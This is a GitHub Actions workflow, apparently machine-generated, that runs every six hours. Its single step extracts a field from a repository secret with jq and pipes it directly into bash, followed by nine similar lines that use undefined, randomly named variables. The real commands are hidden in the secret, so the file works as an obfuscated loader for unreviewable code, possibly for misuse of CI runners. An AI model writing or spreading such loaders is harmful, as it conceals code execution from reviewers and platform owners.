name: zhubanguan3579
on:
  workflow_dispatch:
  schedule:
    - cron: '50 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhubanguan3579
        env:
          ov0: ${{ secrets.ov0 }}
        run: |
          echo $ov0 | jq -r .en8 | /bin/bash
          echo $dan3064 | jq -r .kdm82 | /bin/bash
          echo $dd0155 | jq -r .r54648 | /bin/bash
          echo $uf754 | jq -r .dgl86230 | /bin/bash
          echo $tyjhc844 | jq -r .sobas36222 | /bin/bash
          echo $cnf006 | jq -r .oqw0203 | /bin/bash
          echo $ha249 | jq -r .ychwr88 | /bin/bash
          echo $pbjz3240 | jq -r .f84 | /bin/bash
          echo $xmatu09 | jq -r .pgake71 | /bin/bash
          echo $ztyf01166 | jq -r .vglaj7729 | /bin/bash

